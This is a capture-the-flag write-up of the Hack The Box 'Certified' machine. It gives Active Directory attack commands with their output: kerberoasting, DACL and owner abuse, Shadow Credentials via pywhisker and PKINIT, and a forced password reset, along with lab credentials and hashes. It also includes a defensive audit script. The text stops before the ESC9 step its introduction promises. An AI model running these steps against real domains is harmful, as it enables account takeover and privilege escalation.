HTB — Certified
Shadow Credentials attack via WriteProperty on user object. ADCS ESC9 certificate template abuse to impersonate a privileged account.
As is common in Windows pentests, you will start the Certified box with credentials for the following account: Username: judith.mader Password: judith09
nmap
nmap -sC -sV -Pn -p- --open 10.10.11.41
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-09 11:25 EST
Stats: 0:02:35 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 65.00% done; ETC: 11:28 (0:00:21 remaining)
Nmap scan report for 10.10.11.41
Host is up (0.022s latency).
Not shown: 65515 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-01-09 23:27:49Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
|_ssl-date: 2025-01-09T23:29:19+00:00; +7h00m02s from scanner time.
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
|_ssl-date: 2025-01-09T23:29:18+00:00; +7h00m01s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-09T23:29:19+00:00; +7h00m02s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: certified.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-01-09T23:29:18+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.certified.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.certified.htb
| Not valid before: 2024-05-13T15:49:36
|_Not valid after: 2025-05-13T15:49:36
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49666/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49673/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc Microsoft Windows RPC
49683/tcp open msrpc Microsoft Windows RPC
49716/tcp open msrpc Microsoft Windows RPC
49740/tcp open msrpc Microsoft Windows RPC
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-01-09T23:28:40
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 7h00m01s, deviation: 0s, median: 7h00m00s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 212.59 seconds
nxc smb 10.10.11.41 -u judith.mader -p 'judith09'
SMB 10.10.11.41 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.41 445 DC01 [+] certified.htb\judith.mader:judith09
nxc smb 10.10.11.41 -u judith.mader -p 'judith09' --shares
SMB 10.10.11.41 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.41 445 DC01 [+] certified.htb\judith.mader:judith09
SMB 10.10.11.41 445 DC01 [*] Enumerated shares
SMB 10.10.11.41 445 DC01 Share Permissions Remark
SMB 10.10.11.41 445 DC01 ----- ----------- ------
SMB 10.10.11.41 445 DC01 ADMIN$ Remote Admin
SMB 10.10.11.41 445 DC01 C$ Default share
SMB 10.10.11.41 445 DC01 IPC$ READ Remote IPC
SMB 10.10.11.41 445 DC01 NETLOGON READ Logon server share
SMB 10.10.11.41 445 DC01 SYSVOL READ Logon server share

bloodhound
sudo bloodhound-python -u 'judith.mader' -p 'judith09' -ns 10.10.11.41 -d certified.htb -c all
zip -r certified.htb.zip *.json
BloodHound pre-built queries run against the import (graph screenshots omitted): Shortest Paths to Unconstrained Delegation Systems; Kerberoastable accounts.

usernames
nxc smb 10.10.11.41 -u judith.mader -p 'judith09' --users
SMB 10.10.11.41 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.41 445 DC01 [+] certified.htb\judith.mader:judith09
SMB 10.10.11.41 445 DC01 -Username- -Last PW Set- -BadPW- -Description-
SMB 10.10.11.41 445 DC01 Administrator 2024-05-13 14:53:16 0 Built-in account for administering the computer/domain
SMB 10.10.11.41 445 DC01 Guest <never> 0 Built-in account for guest access to the computer/domain
SMB 10.10.11.41 445 DC01 krbtgt 2024-05-13 15:02:51 0 Key Distribution Center Service Account
SMB 10.10.11.41 445 DC01 judith.mader 2024-05-14 19:22:11 0
SMB 10.10.11.41 445 DC01 management_svc 2024-05-13 15:30:51 0
SMB 10.10.11.41 445 DC01 ca_operator 2024-05-13 15:32:03 0
SMB 10.10.11.41 445 DC01 alexander.huges 2024-05-14 16:39:08 0
SMB 10.10.11.41 445 DC01 harry.wilson 2024-05-14 16:39:37 0
SMB 10.10.11.41 445 DC01 gregory.cameron 2024-05-14 16:40:05 0

kerberoasting
GetUserSPNs.py -dc-ip 10.10.11.41 certified.htb/judith.mader
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
--------------------------------- -------------- ------------------------------------------ -------------------------- --------- ----------
certified.htb/management_svc.DC01 management_svc CN=Management,CN=Users,DC=certified,DC=htb 2024-05-13 11:30:51.476756 <never>
The DC clock is about 7 hours ahead of the attack box (see the nmap clock-skew result) and Kerberos rejects requests outside a 5-minute window, so every Kerberos step from here on is prefixed with an ntpdate sync (the author backgrounds it with a single &; && would guarantee the sync finishes before the request goes out).
sudo ntpdate 10.10.11.41 & GetUserSPNs.py -dc-ip 10.10.11.41 certified.htb/judith.mader -request-user management_svc
[1] 140392
2025-01-09 20:40:14.899080 (-0500) +25201.394745 +/- 0.008736 10.10.11.41 s1 no-leap
CLOCK: time stepped by 25201.394745
[1] + 140392 done sudo ntpdate 10.10.11.41
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
Password:
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon Delegation
--------------------------------- -------------- ------------------------------------------ -------------------------- --------- ----------
certified.htb/management_svc.DC01 management_svc CN=Management,CN=Users,DC=certified,DC=htb 2024-05-13 11:30:51.476756 <never>
[-] CCache file is not found. Skipping...
$krb5tgs$23$*management_svc$CERTIFIED.HTB$certified.htb/management_svc*$01daec3f...
BloodHound shows judith.mader has WriteOwner on the Management group: take ownership of the group, grant herself WriteMembers on it, then add herself as a member.
owneredit.py -action write -new-owner 'judith.mader' -target 'Management' CERTIFIED/judith.mader:judith09 -dc-ip 10.10.11.41
[*] Current owner information below
[*] - SID: S-1-5-21-729746778-2675978091-3820388244-512
[*] - sAMAccountName: Domain Admins
[*] - distinguishedName: CN=Domain Admins,CN=Users,DC=certified,DC=htb
[*] OwnerSid modified successfully!
ldapdomaindump -u 'CERTIFIED\judith.mader' -p 'judith09' -d certified.htb -dc-ip 10.10.11.41
grep -i 'Management' domain_groups.json
"Management"
"CN=Management,CN=Users,DC=certified,DC=htb"
"CN=management service,CN=Users,DC=certified,DC=htb"
"Management"
"Management"
"dn": "CN=Management,CN=Users,DC=certified,DC=htb"
"CN=Management,CN=Users,DC=certified,DC=htb"
"Remote Management Users"
"Members of this group can access WMI resources over management protocols (such as WS-Management via the Windows Remote Management service). This applies only to WMI namespaces that grant access to the user."
"CN=Remote Management Users,CN=Builtin,DC=certified,DC=htb"
"CN=management service,CN=Users,DC=certified,DC=htb"
"Remote Management Users"
"Remote Management Users"
"dn": "CN=Remote Management Users,CN=Builtin,DC=certified,DC=htb"
"RDS Management Servers"
"Servers in this group can perform routine administrative actions on servers running Remote Desktop Services. This group needs to be populated on all servers in a Remote Desktop Services deployment. The servers running the RDS Central Management service must be included in this group."
"CN=RDS Management Servers,CN=Builtin,DC=certified,DC=htb"
"RDS Management Servers"
"RDS Management Servers"
"dn": "CN=RDS Management Servers,CN=Builtin,DC=certified,DC=htb"- the
-target-dnis the one distinguished name in that format so using the above command cna find theDN
dacledit.py -action write -rights WriteMembers -principal 'judith.mader' -target-dn 'CN=Management,CN=Users,DC=certified,DC=htb' CERTIFIED/judith.mader:judith09 -dc-ip 10.10.11.41
[*] DACL backed up to dacledit-20250109-141350.bak
[*] DACL modified successfully!
(rerun the command if it did not take the first time)
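What dacledit just wrote, as an added example that is not the writeup's or impacket's code: "WriteMembers" is not a separate right, it is ADS_RIGHT_DS_WRITE_PROP (0x20) scoped to the member attribute through an ACCESS_ALLOWED_OBJECT_ACE. The script below builds that ACE and decodes it back, using only the standard library. The domain SID is the one shown in the owneredit output; judith.mader's RID is assumed for illustration because the page does not show it.

```python
"""Build and decode the ACE that 'dacledit.py -rights WriteMembers' adds.

Added example, not the writeup's or impacket's code. "WriteMembers" is
ADS_RIGHT_DS_WRITE_PROP (0x20) scoped to the 'member' attribute (schema GUID
bf9679c0-0de6-11d0-a285-00aa003049e2) in an ACCESS_ALLOWED_OBJECT_ACE; the
layouts follow MS-DTYP 2.4.4.3 (object ACE) and 2.4.2.2 (binary SID).
"""
import struct
import uuid

ACCESS_ALLOWED_OBJECT_ACE_TYPE = 0x05
ADS_RIGHT_DS_WRITE_PROP = 0x20
ACE_OBJECT_TYPE_PRESENT = 0x1
ACE_INHERITED_OBJECT_TYPE_PRESENT = 0x2
MEMBER_ATTRIBUTE_GUID = uuid.UUID("bf9679c0-0de6-11d0-a285-00aa003049e2")

DOMAIN_SID = "S-1-5-21-729746778-2675978091-3820388244"  # from the owneredit output above
JUDITH_SID = DOMAIN_SID + "-1103"                         # RID assumed, not taken from the page


def sid_to_bytes(sid: str) -> bytes:
    """Serialise 'S-1-5-21-...' into the binary SID layout."""
    parts = sid.split("-")
    if parts[0] != "S" or parts[1] != "1":
        raise ValueError("not a SID: %r" % sid)
    authority = int(parts[2])
    subs = [int(p) for p in parts[3:]]
    header = struct.pack("<BB", 1, len(subs))   # Revision, SubAuthorityCount
    ident = authority.to_bytes(6, "big")        # IdentifierAuthority is 48-bit big-endian
    return header + ident + b"".join(struct.pack("<I", s) for s in subs)


def bytes_to_sid(data: bytes) -> str:
    revision, count = struct.unpack_from("<BB", data, 0)
    authority = int.from_bytes(data[2:8], "big")
    subs = struct.unpack_from("<%dI" % count, data, 8)
    return "S-%d-%d-%s" % (revision, authority, "-".join(str(s) for s in subs))


def build_write_members_ace(trustee_sid: str) -> bytes:
    """ACCESS_ALLOWED_OBJECT_ACE: WriteProperty on 'member', granted to trustee_sid."""
    body = struct.pack("<II", ADS_RIGHT_DS_WRITE_PROP, ACE_OBJECT_TYPE_PRESENT)
    body += MEMBER_ATTRIBUTE_GUID.bytes_le      # ObjectType, present because the flag bit is set
    body += sid_to_bytes(trustee_sid)
    size = 4 + len(body)                        # ACE_HEADER is AceType, AceFlags, AceSize
    return struct.pack("<BBH", ACCESS_ALLOWED_OBJECT_ACE_TYPE, 0, size) + body


def decode_object_ace(ace: bytes) -> dict:
    """Decode an object ACE far enough to say who gets which right on which attribute."""
    ace_type, _ace_flags, size = struct.unpack_from("<BBH", ace, 0)
    if ace_type != ACCESS_ALLOWED_OBJECT_ACE_TYPE or size != len(ace):
        raise ValueError("not a well-formed ACCESS_ALLOWED_OBJECT_ACE")
    mask, flags = struct.unpack_from("<II", ace, 4)
    offset, object_type = 12, None
    if flags & ACE_OBJECT_TYPE_PRESENT:
        object_type = uuid.UUID(bytes_le=ace[offset:offset + 16])
        offset += 16
    if flags & ACE_INHERITED_OBJECT_TYPE_PRESENT:
        offset += 16                            # InheritedObjectType, not needed here
    is_write_members = bool(mask & ADS_RIGHT_DS_WRITE_PROP) and object_type == MEMBER_ATTRIBUTE_GUID
    return {
        "trustee": bytes_to_sid(ace[offset:]),
        "mask": mask,
        "object_type": str(object_type) if object_type else None,
        "right": "WriteMembers" if is_write_members else "other",
    }


if __name__ == "__main__":
    ace = build_write_members_ace(JUDITH_SID)
    print(ace.hex())
    print(decode_object_ace(ace))
```

dacledit reads the group's nTSecurityDescriptor over LDAP, appends an ACE like this to the DACL and writes the descriptor back; the owneredit step matters because the owner of an object implicitly holds WRITE_DAC, which is what that write requires.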
net rpc group addmem "Management" "judith.mader" -U "certified.htb"/"judith.mader"%"judith09" -S "10.10.11.41"
verify judith.mader is part of the Management group
net rpc group members "Management" -U "certified.htb"/"judith.mader"%"judith09" -S "10.10.11.41"
CERTIFIED\judith.mader
CERTIFIED\management_svc
- the management_svc TGS hash does not crack (the targeted Kerberoast below gives the same uncrackable hash), so Management's write access over management_svc is used instead
sudo ntpdate 10.10.11.41 & python3 targetedKerberoast.py -v -d 'certified.htb' -u 'judith.mader' -p 'judith09'
[1] 294591
2025-01-09 22:34:50.476500 (-0500) +25201.597600 +/- 0.009927 10.10.11.41 s1 no-leap
CLOCK: time stepped by 25201.597600
[1] + 294591 done sudo ntpdate 10.10.11.41
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Printing hash for (management_svc)
$krb5tgs$23$*management_svc$CERTIFIED.HTB$certified.htb/management_svc*$3026b11a...$458717564119b2c82fc7c18694e089bf837bb36c42757b220974b3f2a4e4197afc02bd46ea4888f1e146ee88bae6c69fa356a193d85bea946962ee4847c1c5332f9ea1158f9ed73fd105770e56b8823096b58cf2cc87245d992c07efefd580d9940941cfc93063ea59705a9f381117086b8ab9be0767f11daebc840e788692aeb9b77bc379770dcb9d71cfe91e7c36fbd0d1c1c338befd4827d88ab209119253c0d64ef84ee25e3010299547686c547122c4863376d8fe13b64067dd7e5c0626e5faafe2ecefcdab594396cd11f6c8146a28c31e5c141ba24033cd6104c04767f181c69901a1e7bd87e956409cfc1e3dc30b9e81cda37136d4902b7b43df2ec86b060f46be33af101442a416273d102a296a5c90b14c94afafcc9b7bc1d8c4871da33318eb7bbf25ea94e25e5dfd684c5e8d77fc0a00b604b905348523b1e78d8fe85fdb8c602fa8dcdfdcd1fd1d4fad4ae2ab1ef6042634917370a4f0edc9f05d4b3461c758baaa859ee1868c510374c8245f1edc4eb9676952b5f1adb1d8d91f0e4719e75321b4834f2d0a149446e4c283316b402bc55c4c7c3f62e12f28d5a72c5b14c183fdc6f194df36a44ecb380f1cea6ee3577cec0f8f29a5f1e7df9bb9756d41cc40f923807afd6b2d1ca13f7d8a2fa3d2ee1507096a4daae3bb006f8837ce4f7f70655a419a38256df0dd3aac326280e5d87933a4fc947cef7f548d81d5abe8247ac1ba850b1e8b6fbdaf7347233fa092f832deaf9a8d4b98cdf47f94586d7f354cdddfd47b93cc2b106ddbc8ec71889681933510eef7fc5717328062278adf834c8c63d8e1f82e3823e1c73a06c77e58ef67729797f8b35613843bc1c04f316229c28104b2924221e357743ca4e48fdd4ba0fd19cbd6b6ccd93ac7ea606a27a03d07426795c3a38e7789167484d13f18589eedbc57ee71b0967a78c1916f4fb5696e3ff040d670495a4646979123e01b1a7b4e3c7aa0f8e85eb0ea3947749bf141c47ae2b0abd21a52a1a8c6770fb1172f5cd6903f0438c41937f4f16d68a55e926f6b12b82084e4d0adfbda2bbac77e0cb9281c06ac195903ddc5b84bd63b360ed84fcec777c6f881b487eb840a2c933a1940c19c544a09e280392520c00d2812784e96100faf589f7e7d3c093829d1bb74270bdcb2e366d5456609730e8064db1a8c1f0786e4a7cc389c367ac6995f63b7f012fb8930aab19c626e4db385e47407aaecdefe4bffd509a67c8176150580f9365386e15923edbca386978c99f4c21ff9f92f56d372d1b97041864af7a0fa9584a1eb3ae4eeea0cebe04a22802734ba2df565fe348a15efec09b6b1bfd28d136bad005c536531
5ff120f4e2ad7ab9e3b5bce4ffdf1cbee03406becb21ffc5db0f93768a80012b89edc1b04eb9cf5f3c46e382f690bacf316a47c1a2e806c852727502f9ec39ab7a5a6bf78095050fa370e4c53676fc16c659843fd08f36c18c687ce5a3e489414eaaa7fada0ca8f490fe1c5bcb30da75bd4174740d523b0d68abb430051f5015d7e52b8676b0f2902c06ca7a8bba68674b1235e1d65a8b9b35c69208f414a6eeee831c62

shadow credential attack
- Management has WriteProperty on the management_svc user object, so a key credential can be written to it (Shadow Credentials); that gives a PKINIT TGT for management_svc and, from it, the account's NT hash to authenticate with
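Before running pywhisker, here is what the attribute it writes looks like, as an added example that is not from the writeup or from pywhisker. msDS-KeyCredentialLink is a DN-Binary string wrapping a KEYCREDENTIALLINK_BLOB; the script builds one, parses it back, and audits a list of values for recently added keys, which is the check a defender would run on service accounts. The target DN and DeviceID are the ones in the pywhisker output below; the key material is a constructed placeholder rather than a real RSA public key, and the creation time is assumed.

```python
"""Build, parse and audit an msDS-KeyCredentialLink value.

Added example, not from the writeup or from pywhisker. The attribute is a
DN-Binary string "B:<hex length>:<hex>:<owner DN>" wrapping a
KEYCREDENTIALLINK_BLOB (MS-ADTS 2.2.20): a 4-byte version, then entries of
2-byte little-endian length, 1-byte identifier, value.
"""
import hashlib
import struct
import uuid
from datetime import datetime, timedelta, timezone

# entry identifiers from MS-ADTS 2.2.20.2
KEY_ID, KEY_HASH, KEY_MATERIAL, KEY_USAGE, KEY_SOURCE = 0x01, 0x02, 0x03, 0x04, 0x05
DEVICE_ID, CUSTOM_KEY_INFO, LAST_LOGON_TIME, CREATION_TIME = 0x06, 0x07, 0x08, 0x09
NAMES = {0x01: "KeyID", 0x02: "KeyHash", 0x03: "KeyMaterial", 0x04: "KeyUsage",
         0x05: "KeySource", 0x06: "DeviceId", 0x07: "CustomKeyInformation",
         0x08: "KeyApproximateLastLogonTimeStamp", 0x09: "KeyCreationTime"}
VERSION = 0x200                                    # KEY_CREDENTIAL_LINK_VERSION_2
EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)  # FILETIME epoch


def to_filetime(dt: datetime) -> int:
    d = dt - EPOCH                                 # integer maths: 100 ns ticks, no float rounding
    return (d.days * 86400 + d.seconds) * 10_000_000 + d.microseconds * 10


def from_filetime(ft: int) -> datetime:
    return EPOCH + timedelta(microseconds=ft // 10)


def build_blob(key_material: bytes, device_id: uuid.UUID, created: datetime) -> bytes:
    entries = [
        (KEY_ID, hashlib.sha256(key_material).digest()),  # KeyID is SHA-256 of the key material
        (KEY_MATERIAL, key_material),
        (KEY_USAGE, b"\x01"),                        # KEY_USAGE_NGC
        (KEY_SOURCE, b"\x00"),                       # KEY_SOURCE_AD
        (DEVICE_ID, device_id.bytes_le),
        (CREATION_TIME, struct.pack("<Q", to_filetime(created))),
    ]
    out = struct.pack("<I", VERSION)
    for ident, value in entries:
        out += struct.pack("<HB", len(value), ident) + value
    return out


def parse_blob(blob: bytes) -> dict:
    (version,) = struct.unpack_from("<I", blob, 0)
    if version != VERSION:
        raise ValueError("unexpected KeyCredentialLink version 0x%x" % version)
    pos, fields = 4, {}
    while pos < len(blob):
        length, ident = struct.unpack_from("<HB", blob, pos)
        value = blob[pos + 3:pos + 3 + length]
        pos += 3 + length
        name = NAMES.get(ident, "Unknown(0x%02x)" % ident)
        if ident == DEVICE_ID:
            fields[name] = str(uuid.UUID(bytes_le=value))
        elif ident in (CREATION_TIME, LAST_LOGON_TIME):
            fields[name] = from_filetime(struct.unpack("<Q", value)[0])
        elif ident in (KEY_ID, KEY_HASH, KEY_MATERIAL):
            fields[name] = value.hex()
        else:
            fields[name] = value
    return fields


def to_dn_binary(blob: bytes, owner_dn: str) -> str:
    h = blob.hex().upper()
    return "B:%d:%s:%s" % (len(h), h, owner_dn)


def from_dn_binary(value: str):
    _, length, h, dn = value.split(":", 3)
    if int(length) != len(h):
        raise ValueError("DN-Binary length does not match payload")
    return bytes.fromhex(h), dn


def audit(values, now: datetime, max_age_hours: float = 24.0):
    """Flag key credentials younger than max_age_hours. A service account never enrolls a
    Windows Hello or device key on its own, so a fresh entry on one is a Shadow Credentials
    indicator. Returns (owner DN, DeviceId, age in hours)."""
    findings = []
    for v in values:
        blob, dn = from_dn_binary(v)
        f = parse_blob(blob)
        age_hours = (now - f["KeyCreationTime"]).total_seconds() / 3600
        if age_hours < max_age_hours:
            findings.append((dn, f["DeviceId"], age_hours))
    return findings


# constructed sample: what pywhisker's write on management_svc would look like
TARGET_DN = "CN=management service,CN=Users,DC=certified,DC=htb"
SAMPLE_DEVICE_ID = uuid.UUID("a0cef891-c19c-5000-41cd-cdafd876937f")
SAMPLE_KEY = b"\x30\x82\x01\x0a" + b"\xab" * 266           # placeholder bytes, not a real key
SAMPLE_CREATED = datetime(2025, 1, 9, 23, 30, tzinfo=timezone.utc)  # assumed
SAMPLE_VALUE = to_dn_binary(build_blob(SAMPLE_KEY, SAMPLE_DEVICE_ID, SAMPLE_CREATED), TARGET_DN)


def sample_audit(hours_later: float):
    """Run audit() on the sample as if checked hours_later after the write."""
    return audit([SAMPLE_VALUE], SAMPLE_CREATED + timedelta(hours=hours_later))


if __name__ == "__main__":
    print(parse_blob(from_dn_binary(SAMPLE_VALUE)[0]))
    print(sample_audit(2))
```

In a real audit the values come from an LDAP read of msDS-KeyCredentialLink on every account (it is readable by default); the write that pywhisker performs is also logged by the DC as event 5136 on that attribute when Directory Service Changes auditing is on.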
pywhisker -d "certified.htb" -u "judith.mader" -p "judith09" --target "management_svc" --action "add"
[*] Searching for the target account
[*] Target user found: CN=management service,CN=Users,DC=certified,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: a0cef891-c19c-5000-41cd-cdafd876937f
[*] Updating the msDS-KeyCredentialLink attribute of management_svc
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[+] Saved PFX (#PKCS12) certificate & key at path: hWjeEN6s.pfx
[*] Must be used with password: f3yKhrBp0l19SgXu6mnk
[*] A TGT can now be obtained with https://github.com/dirkjanm/PKINITtools
git clone https://github.com/dirkjanm/PKINITtools.git
sudo ntpdate 10.10.11.41 & python3 /opt/linux/PKINITtools/gettgtpkinit.py -d certified.htb -cert-pfx hWjeEN6s.pfx -pfx-pass f3yKhrBp0l19SgXu6mnk certified.htb/management_svc management.ccache
[1] 38277
2025-01-09 23:33:05.017063 (-0500) +25202.155711 +/- 0.010562 10.10.11.41 s1 no-leap
CLOCK: time stepped by 25202.155711
[1] + done sudo ntpdate 10.10.11.41
2025-01-09 23:33:05,088 minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-01-09 23:33:05,103 minikerberos INFO Requesting TGT
INFO:minikerberos:Requesting TGT
2025-01-09 16:33:18,921 minikerberos INFO AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2025-01-09 16:33:18,921 minikerberos INFO aeeca941bbb824881d0d5b5374eaa337517dab34dd597f567a77f3a15d70fd63
INFO:minikerberos:aeeca941bbb824881d0d5b5374eaa337517dab34dd597f567a77f3a15d70fd63
2025-01-09 16:33:18,924 minikerberos INFO Saved TGT to file
INFO:minikerberos:Saved TGT to file
export KRB5CCNAME=/home/sake/htb-labs/Certified/management.ccache
A second pywhisker run (output not shown) produced jszsD8ch.pfx; the TGT and AS-REP key used from here on come from it:
sudo ntpdate 10.10.11.41 & python3 /opt/linux/PKINITtools/gettgtpkinit.py -d certified.htb -cert-pfx jszsD8ch.pfx -pfx-pass HrRxb2qXNYt9b2ss1BdL certified.htb/management_svc management.ccache
[1] 65867
2025-01-09 23:41:39.479407 (-0500) +25201.715631 +/- 0.008481 10.10.11.41 s1 no-leap
CLOCK: time stepped by 25201.715631
[1] + done sudo ntpdate 10.10.11.41
2025-01-09 23:41:39,579 minikerberos INFO Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2025-01-09 23:41:39,591 minikerberos INFO Requesting TGT
INFO:minikerberos:Requesting TGT
2025-01-09 23:41:43,808 minikerberos INFO AS-REP encryption key (you might need this later):
INFO:minikerberos:AS-REP encryption key (you might need this later):
2025-01-09 23:41:43,808 minikerberos INFO 830721beaa1e574b2fcdc57050e6e59e7d1f3ad6bd1d6085330ac8d708dea916
INFO:minikerberos:830721beaa1e574b2fcdc57050e6e59e7d1f3ad6bd1d6085330ac8d708dea916
2025-01-09 23:41:43,810 minikerberos INFO Saved TGT to file
INFO:minikerberos:Saved TGT to file
sudo ntpdate 10.10.11.41 & python3 /opt/linux/PKINITtools/getnthash.py -key 830721beaa1e574b2fcdc57050e6e59e7d1f3ad6bd1d6085330ac8d708dea916 certified.htb/management_svc
[1] 68266
2025-01-09 23:43:43.523778 (-0500) +25201.722728 +/- 0.010143 10.10.11.41 s1 no-leap
CLOCK: time stepped by 25201.722728
[1] + done sudo ntpdate 10.10.11.41
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Using TGT from cache
[*] Requesting ticket to self with PAC
Recovered NT Hash
a091c183...
nxc smb 10.10.11.41 -u management_svc -H 'a091c183...'
SMB 10.10.11.41 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.41 445 DC01 [+] certified.htb\management_svc:a091c183...
management_svc is in Remote Management Users (see the net user output below), so the hash also works over WinRM:
evil-winrm -i 10.10.11.41 -u management_svc -H 'a091c183...'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\management_svc\Documents> whoami
certified\management_svc

user.txt
*Evil-WinRM* PS C:\Users\management_svc\Desktop> cat user.txt
4160f374...

priv esc
*Evil-WinRM* PS C:\Users> net user management_svc
User name management_svc
Full Name management service
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 5/13/2024 7:30:51 AM
Password expires Never
Password changeable 5/14/2024 7:30:51 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 1/9/2025 8:41:43 PM
Logon hours allowed All
Local Group Memberships *Remote Management Use
Global Group memberships *Management *Domain Users
The command completed successfully.

GenericAll to CA_OPERATOR
BloodHound: management_svc has GenericAll over CA_OPERATOR, which includes Force Change Password (screenshot omitted).
*Evil-WinRM* PS C:\Users\management_svc> upload /opt/windows/PowerView.ps1
*Evil-WinRM* PS C:\Users\management_svc> Import-Module .\PowerView.ps1
$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity CA_OPERATOR -AccountPassword $UserPassword
(The shell already runs as management_svc, so no -Credential is needed and the $SecPassword/$Cred lines from the PowerView template are unnecessary. A password reset is noisy and locks the real owner out; the Shadow Credentials route used in the recap below gets the same access without touching the password.)
nxc smb 10.10.11.41 -u CA_OPERATOR -p 'Password123!'
SMB 10.10.11.41 445 DC01 [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:certified.htb) (signing:True) (SMBv1:False)
SMB 10.10.11.41 445 DC01 [+] certified.htb\CA_OPERATOR:Password123!

enumerate certificates
- authenticate as CA_OPERATOR (net user /domain is an alternative to Set-DomainUserPassword for the reset)
*Evil-WinRM* PS C:\Users\management_svc> net user CA_OPERATOR Password123! /domain
*Evil-WinRM* PS C:\Users\management_svc> upload /opt/windows/Certify.exe
*Evil-WinRM* PS C:\Users\management_svc> .\Certify.exe find /ca:"certified-DC01-CA"
Certify's output below only lists the two templates where the enrollee supplies the subject, both restricted to Domain/Enterprise Admins; the ESC9 condition shows up in the certipy find -vulnerable run that follows.
CA Name : DC01.certified.htb\certified-DC01-CA
Template Name : WebServer
Schema Version : 1
Validity Period : 2 years
Renewal Period : 6 weeks
msPKI-Certificate-Name-Flag : ENROLLEE_SUPPLIES_SUBJECT
mspki-enrollment-flag : NONE
Authorized Signatures Required : 0
pkiextendedkeyusage : Server Authentication
mspki-certificate-application-policy : <null>
Permissions
Enrollment Permissions
Enrollment Rights : CERTIFIED\Domain Admins S-1-5-21-729746778-2675978091-3820388244-512
CERTIFIED\Enterprise Admins S-1-5-21-729746778-2675978091-3820388244-519
Object Control Permissions
Owner : CERTIFIED\Enterprise Admins S-1-5-21-729746778-2675978091-3820388244-519
WriteOwner Principals : CERTIFIED\Domain Admins S-1-5-21-729746778-2675978091-3820388244-512
CERTIFIED\Enterprise Admins S-1-5-21-729746778-2675978091-3820388244-519
WriteDacl Principals : CERTIFIED\Domain Admins S-1-5-21-729746778-2675978091-3820388244-512
CERTIFIED\Enterprise Admins S-1-5-21-729746778-2675978091-3820388244-519
WriteProperty Principals : CERTIFIED\Domain Admins S-1-5-21-729746778-2675978091-3820388244-512
